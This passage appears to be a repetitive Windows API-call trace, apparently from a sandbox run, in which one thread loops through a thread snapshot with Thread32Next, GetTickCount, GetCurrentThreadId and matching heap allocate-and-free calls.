0x5b4 [0235.079] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.079] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.079] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.080] GetTickCount () returned 0x1140d3a [0235.080] GetCurrentThreadId () returned 0x5b4 [0235.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.080] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.081] GetTickCount () returned 0x1140d3a [0235.081] GetCurrentThreadId () returned 0x5b4 [0235.081] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.081] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.082] GetTickCount () returned 0x1140d3a [0235.082] GetCurrentThreadId () returned 0x5b4 [0235.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.082] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.083] GetTickCount () returned 0x1140d3a [0235.083] GetCurrentThreadId () returned 0x5b4 [0235.083] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.083] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.084] GetTickCount () returned 0x1140d3a [0235.084] GetCurrentThreadId () returned 0x5b4 [0235.084] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.084] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.084] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.085] GetTickCount () returned 0x1140d4a [0235.085] GetCurrentThreadId () returned 0x5b4 [0235.085] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.085] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.085] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.086] GetTickCount () returned 0x1140d4a [0235.086] GetCurrentThreadId () returned 0x5b4 [0235.086] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.086] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.086] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.087] GetTickCount () returned 0x1140d4a [0235.087] GetCurrentThreadId () returned 0x5b4 [0235.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.087] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.087] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.088] GetTickCount () returned 0x1140d4a [0235.088] GetCurrentThreadId () returned 0x5b4 [0235.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.088] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.089] GetTickCount () returned 0x1140d4a [0235.089] GetCurrentThreadId () returned 0x5b4 [0235.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.089] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.090] GetTickCount () returned 0x1140d4a [0235.090] GetCurrentThreadId () returned 0x5b4 [0235.090] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.090] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.090] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.091] GetTickCount () returned 0x1140d4a [0235.091] GetCurrentThreadId () returned 0x5b4 [0235.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.091] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.092] GetTickCount () returned 0x1140d4a [0235.092] GetCurrentThreadId () returned 0x5b4 [0235.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.092] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.093] GetTickCount () returned 0x1140d4a [0235.093] GetCurrentThreadId () returned 0x5b4 [0235.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.093] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.094] GetTickCount () returned 0x1140d4a [0235.094] GetCurrentThreadId () returned 0x5b4 [0235.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.094] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.095] GetTickCount () returned 0x1140d4a [0235.095] GetCurrentThreadId () returned 0x5b4 [0235.095] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.095] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.095] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.096] GetTickCount () returned 0x1140d4a [0235.096] GetCurrentThreadId () returned 0x5b4 [0235.096] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.096] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.096] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.097] GetTickCount () returned 0x1140d4a [0235.097] GetCurrentThreadId () returned 0x5b4 [0235.097] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.097] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.097] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.098] GetTickCount () returned 0x1140d4a [0235.098] GetCurrentThreadId () returned 0x5b4 [0235.098] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.098] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.098] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.099] GetTickCount () returned 0x1140d4a [0235.099] GetCurrentThreadId () returned 0x5b4 [0235.099] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.099] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.099] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.100] GetTickCount () returned 0x1140d5a [0235.100] GetCurrentThreadId () returned 0x5b4 [0235.100] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.100] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.100] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.101] GetTickCount () returned 0x1140d5a [0235.101] GetCurrentThreadId () returned 0x5b4 [0235.101] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.101] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.101] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.102] GetTickCount () returned 0x1140d5a [0235.102] GetCurrentThreadId () returned 0x5b4 [0235.102] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.102] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.102] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.103] GetTickCount () returned 0x1140d5a [0235.103] GetCurrentThreadId () returned 0x5b4 [0235.103] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.103] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.103] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.104] GetTickCount () returned 0x1140d5a [0235.104] GetCurrentThreadId () returned 0x5b4 [0235.104] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.104] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.104] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.105] GetTickCount () returned 0x1140d5a [0235.105] GetCurrentThreadId () returned 0x5b4 [0235.105] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.105] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.105] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.106] GetTickCount () returned 0x1140d5a [0235.106] GetCurrentThreadId () returned 0x5b4 [0235.106] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.106] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.106] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.107] GetTickCount () returned 0x1140d5a [0235.107] GetCurrentThreadId () returned 0x5b4 [0235.107] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.107] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.107] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.108] GetTickCount () returned 0x1140d5a [0235.108] GetCurrentThreadId () returned 0x5b4 [0235.108] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.108] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.108] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.109] GetTickCount () returned 0x1140d5a [0235.109] GetCurrentThreadId () returned 0x5b4 [0235.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.109] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.109] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.110] GetTickCount () returned 0x1140d5a [0235.110] GetCurrentThreadId () returned 0x5b4 [0235.110] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.110] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.110] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.111] GetTickCount () returned 0x1140d5a [0235.111] GetCurrentThreadId () returned 0x5b4 [0235.111] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.111] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.111] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.112] GetTickCount () returned 0x1140d5a [0235.112] GetCurrentThreadId () returned 0x5b4 [0235.112] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.112] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.112] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.113] GetTickCount () returned 0x1140d5a [0235.113] GetCurrentThreadId () returned 0x5b4 [0235.113] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.113] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.114] GetTickCount () returned 0x1140d5a [0235.114] GetCurrentThreadId () returned 0x5b4 [0235.114] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.114] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.114] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.115] GetTickCount () returned 0x1140d5a [0235.115] GetCurrentThreadId () returned 0x5b4 [0235.115] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.115] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.115] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.116] GetTickCount () returned 0x1140d69 [0235.116] GetCurrentThreadId () returned 0x5b4 [0235.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.116] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.116] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.117] GetTickCount () returned 0x1140d69 [0235.117] GetCurrentThreadId () returned 0x5b4 [0235.117] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.117] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.117] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.118] GetTickCount () returned 0x1140d69 [0235.118] GetCurrentThreadId () returned 0x5b4 [0235.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.118] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.118] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.119] GetTickCount () returned 0x1140d69 [0235.119] GetCurrentThreadId () returned 0x5b4 [0235.119] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.119] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.119] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.120] GetTickCount () returned 0x1140d69 [0235.120] GetCurrentThreadId () returned 0x5b4 [0235.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.120] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.120] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.121] GetTickCount () returned 0x1140d69 [0235.121] GetCurrentThreadId () returned 0x5b4 [0235.121] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.121] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.121] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.122] GetTickCount () returned 0x1140d69 [0235.122] GetCurrentThreadId () returned 0x5b4 [0235.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.122] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.122] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.123] GetTickCount () returned 0x1140d69 [0235.123] GetCurrentThreadId () returned 0x5b4 [0235.123] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.123] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.123] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.124] GetTickCount () returned 0x1140d69 [0235.124] GetCurrentThreadId () returned 0x5b4 [0235.124] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.124] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.124] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.125] GetTickCount () returned 0x1140d69 [0235.125] GetCurrentThreadId () returned 0x5b4 [0235.125] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.125] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.125] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.125] GetTickCount () returned 0x1140d69 [0235.126] GetCurrentThreadId () returned 0x5b4 [0235.126] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.126] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.126] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.126] GetTickCount () returned 0x1140d69 [0235.126] GetCurrentThreadId () returned 0x5b4 [0235.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.127] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.127] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.127] GetTickCount () returned 0x1140d69 [0235.127] GetCurrentThreadId () returned 0x5b4 [0235.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.128] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.128] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.128] GetTickCount () returned 0x1140d69 [0235.128] GetCurrentThreadId () returned 0x5b4 [0235.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.129] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.129] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.129] GetTickCount () returned 0x1140d69 [0235.129] GetCurrentThreadId () returned 0x5b4 [0235.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.130] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.130] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.130] GetTickCount () returned 0x1140d69 [0235.130] GetCurrentThreadId () returned 0x5b4 [0235.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.131] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.131] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.132] GetTickCount () returned 0x1140d79 [0235.132] GetCurrentThreadId () returned 0x5b4 [0235.132] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.132] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.132] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.133] GetTickCount () returned 0x1140d79 [0235.133] GetCurrentThreadId () returned 0x5b4 [0235.133] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.133] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.133] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.134] GetTickCount () returned 0x1140d79 [0235.134] GetCurrentThreadId () returned 0x5b4 [0235.134] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.134] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.134] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.135] GetTickCount () returned 0x1140d79 [0235.135] GetCurrentThreadId () returned 0x5b4 [0235.135] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.135] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.135] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.136] GetTickCount () returned 0x1140d79 [0235.136] GetCurrentThreadId () returned 0x5b4 [0235.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.136] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.136] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.137] GetTickCount () returned 0x1140d79 [0235.137] GetCurrentThreadId () returned 0x5b4 [0235.137] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.137] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.137] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.137] GetTickCount () returned 0x1140d79 [0235.138] GetCurrentThreadId () returned 0x5b4 [0235.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.138] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.138] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.138] GetTickCount () returned 0x1140d79 [0235.138] GetCurrentThreadId () returned 0x5b4 [0235.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.139] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.139] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.139] GetTickCount () returned 0x1140d79 [0235.139] GetCurrentThreadId () returned 0x5b4 [0235.140] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.140] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.140] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.140] GetTickCount () returned 0x1140d79 [0235.140] GetCurrentThreadId () returned 0x5b4 [0235.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.141] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.141] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.141] GetTickCount () returned 0x1140d79 [0235.141] GetCurrentThreadId () returned 0x5b4 [0235.141] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.142] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.142] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.142] GetTickCount () returned 0x1140d79 [0235.142] GetCurrentThreadId () returned 0x5b4 [0235.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.143] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.143] GetTickCount () returned 0x1140d79 [0235.143] GetCurrentThreadId () returned 0x5b4 [0235.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.144] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.144] GetTickCount () returned 0x1140d79 [0235.144] GetCurrentThreadId () returned 0x5b4 [0235.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.145] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.145] GetTickCount () returned 0x1140d79 [0235.145] GetCurrentThreadId () returned 0x5b4 [0235.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.145] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.146] GetTickCount () returned 0x1140d79 [0235.146] GetCurrentThreadId () returned 0x5b4 [0235.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.147] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.147] GetTickCount () returned 0x1140d88 [0235.147] GetCurrentThreadId () returned 0x5b4 [0235.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.148] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.148] GetTickCount () returned 0x1140d88 [0235.148] GetCurrentThreadId () returned 0x5b4 [0235.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.149] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.149] GetTickCount () returned 0x1140d88 [0235.149] GetCurrentThreadId () returned 0x5b4 [0235.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.149] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.150] GetTickCount () returned 0x1140d88 [0235.150] GetCurrentThreadId () returned 0x5b4 [0235.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.150] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.151] GetTickCount () returned 0x1140d88 [0235.151] GetCurrentThreadId () returned 0x5b4 [0235.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0235.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0235.151] Thread32Next (hSnapshot=0x654, lpte=0x39af434) returned 1 [0235.152] GetTickCount () returned 0x1140d88 [0235.152] GetCurrentThreadId () returned 0x5b4 [0235.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) 